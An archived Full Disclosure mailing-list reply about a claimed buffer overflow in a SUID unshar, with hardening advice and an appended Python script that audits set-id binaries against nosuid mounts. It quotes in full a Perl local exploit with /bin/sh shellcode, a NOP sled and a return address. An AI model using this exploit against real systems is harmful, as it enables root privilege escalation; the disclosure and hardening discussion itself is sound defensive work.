Full Disclosure mailing list archives
Re: flames security group start to play , yet another vuln found (rustymemory and welshboi)
From: Todd Burroughs <todd () hostopia com>
Date: Thu, 4 Dec 2003 02:34:07 -0500 (EST)
This has to be a troll, I mean if I made /bin/sh SUID root and gave you a shell, you could probably get root on my system. You shouldn't have much on your system that is SUID root. I have no idea why someone would even think that unshar would be set this way.

If you use SuSE, set security to "paranoid" and it does a decent job, after that you will need to add whatever you need to the security.local file, depending on what you use the system for.

I know I'm biting on this, but it does underscore the fact that you should "unsuid" anything that is not really needed on your system. I make a small partition and mount everything else "nosuid". I put anything that needs suid or sgid on that filesystem and make symlinks to where it should be. This makes it easy to find SUID programs: run mount and make sure things are mounted nosuid, then look at your "suid partition".

Todd Burroughs

---
The Internet has given us unprecedented opportunity to communicate and share on a global scale without borders; fight to keep it that way.

On Wed, 3 Dec 2003, KF wrote:
> if you are bored .... download unrar.
>
> -KF
>
> rustymemory wrote:
>
> By: flames.bluefox.net.nz
>
> if unshar suid; then you w00t
>
> proof of concept?
>
> rustymemory@flames:~$ unshar -f `perl -e 'print"A"x2000'`
> ............................AAAAAAAAAAAAAASegmentation fault
>
> welshboi@flames:~$ more unshar.pl
> #!/usr/bin/perl
> #/usr/bin/unshar local sploit.
> #coded by welshboi (deadbeat)
> #found by rustymemory
> #
> #FLAMES SECURITY GROUP
> #Private, please dont distribute
> #affects all linux distributions , tested on slackware 9.1 and MDK
> ###############################################
> #[deadbeat@pikachu sploits]$ perl unshar.pl   #
> #                                             #
> #[] /usr/bin/unshar exploit                   #
> #[] coded by: deadbeat []                     #
> #[] found by: rustymemory []                  #
> #_f1GWugHu[SPZ                                #
> #                                             #
> #sh-2.05b$                                    #
> ###############################################
>
> # 47byte shellcode (exec /bin/sh)
> $hell = "\xeb\x1f\x5f\x89\xfc\x66\xf7\xd4\x31\xc0\x8a\x07".
> "\x47\x57\xae\x75\xfd\x88\x67\xff\x48\x75\xf6\x5b".
> "\x53\x50\x5a\x89\xe1\xb0\x0b\xcd\x80\xe8\xdc\xff".
> "\xff\xff\x01\x2f\x62\x69\x6e\x2f\x73\x68\x01";
>
> $egg = 2000;
> $buf = 1128;
> $nop = "\x90";
> $offset = 0;
> $ret =0x40055bdc;
>
> if(@ARGV == 1) {$offset = $ARGV[0];}
>
> $addr = pack('l', ($ret + $offset));
>
> for($i = 0; $i<$buf; $i += 4){$evil .=$addr;}
> for($i = 0; $i<($egg - length($hell) -100); $i++){$evil .=$nop;}
> $evil .= $hell;
>
> print "\n[] /usr/bin/unshar exploit []\n";
> print "[] coded by: deadbeat, uk2sec []\n";
> print "[] found by: rustymemory []\n\n";
> print ("[]trying addr: 0x", sprintf('%lx',($ret + $offset)),"\n");
>
> system("/usr/bin/unshar -f $evil");
>
> ---------------------------------------------------------
> shouts to ? calidan(daddeh) , linucks ( wifi whore) , h0stile (the maniac) , and the rest of flames security group. and rusty's fiancee

_______________________________________________
Full-Disclosure - We believe in it.
Charter: http://lists.netsys.com/full-disclosure-charter.html
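The nosuid layout Todd describes (one small partition allowed to carry set-id binaries, everything else mounted nosuid, then audit with mount and a file walk) can be checked mechanically. The script below is an added example written for this archive page; it is not code from Todd, KF or the original posters. It parses a /proc/mounts style table, does longest-prefix matching to find which mount holds a file, and reports set-id files whose bits are actually honoured and which of those sit outside the allowed partition. The mount table, file list, modes and the ALLOWED_SUID_MOUNT path are constructed assumptions for the demo; scan_live shows how the same logic would be fed from a real system.

```python
#!/usr/bin/env python3
"""Audit SUID/SGID binaries against the mount table (added example, not from the post)."""
import os
import stat

# Constructed sample of /proc/mounts: device mountpoint fstype options dump pass
SAMPLE_MOUNTS = """\
/dev/sda1 / ext3 rw 0 0
/dev/sda2 /usr ext3 rw,nosuid 0 0
/dev/sda3 /home ext3 rw,nosuid,nodev 0 0
/dev/sda4 /suid ext3 rw 0 0
"""

# Constructed sample of (path, st_mode) pairs as os.lstat would report them.
SAMPLE_FILES = [
    ("/suid/bin/su", 0o104755),        # SUID root on the dedicated partition: expected
    ("/usr/bin/unshar", 0o104755),     # SUID bit set, but /usr is nosuid so it is inert
    ("/home/rusty/unshar", 0o104755),  # same, /home is nosuid
    ("/bin/sh", 0o100755),             # no set-id bit at all
    ("/sbin/ping", 0o104755),          # SUID on /, which is NOT nosuid: report it
    ("/usr/bin/wall", 0o102755),       # SGID on a nosuid mount: inert
]

ALLOWED_SUID_MOUNT = "/suid"  # assumption: the one partition meant to hold set-id binaries


def parse_mounts(text):
    """Return {mountpoint: set(options)} from /proc/mounts style text."""
    mounts = {}
    for line in text.splitlines():
        fields = line.split()
        if len(fields) < 4:
            continue
        mountpoint = fields[1].replace("\\040", " ")  # /proc/mounts escapes spaces
        mounts[mountpoint] = set(fields[3].split(","))
    return mounts


def mount_for(path, mounts):
    """Longest-prefix match: the mount point that actually holds `path`."""
    best = "/"
    for mp in mounts:
        if mp == "/":
            continue
        if (path == mp or path.startswith(mp.rstrip("/") + "/")) and len(mp) > len(best):
            best = mp
    return best


def is_setid(mode):
    """True for regular files carrying the SUID or SGID bit."""
    return stat.S_ISREG(mode) and bool(mode & (stat.S_ISUID | stat.S_ISGID))


def audit(files, mounts, allowed=ALLOWED_SUID_MOUNT):
    """Return (effective, violations).

    effective  - set-id files whose bits the kernel will honour (mount lacks nosuid)
    violations - the subset of `effective` living outside the allowed partition
    """
    effective, violations = [], []
    for path, mode in files:
        if not is_setid(mode):
            continue
        mp = mount_for(path, mounts)
        if "nosuid" in mounts.get(mp, set()):
            continue  # bit is present but ignored on this filesystem
        effective.append(path)
        if mp != allowed:
            violations.append(path)
    return effective, violations


def mounts_without_nosuid(mounts, allowed=ALLOWED_SUID_MOUNT):
    """Filesystems that the layout says should be nosuid but are not."""
    return sorted(mp for mp, opts in mounts.items()
                  if mp != allowed and "nosuid" not in opts)


def scan_live(root="/"):
    """Collect (path, st_mode) from the real filesystem; not used by the demo data."""
    found = []
    for dirpath, _dirnames, filenames in os.walk(root):
        for name in filenames:
            p = os.path.join(dirpath, name)
            try:
                found.append((p, os.lstat(p).st_mode))
            except OSError:
                pass
    return found


if __name__ == "__main__":
    mounts = parse_mounts(SAMPLE_MOUNTS)
    effective, violations = audit(SAMPLE_FILES, mounts)
    print("set-id files whose bits are honoured:", effective)
    print("set-id files outside the SUID partition:", violations)
    print("filesystems that should be nosuid:", mounts_without_nosuid(mounts))
```

On a live box, replace SAMPLE_MOUNTS with the contents of /proc/mounts and SAMPLE_FILES with scan_live(); the two lists then give you exactly the review Todd suggests: what is on the suid partition, and which other filesystems still need nosuid.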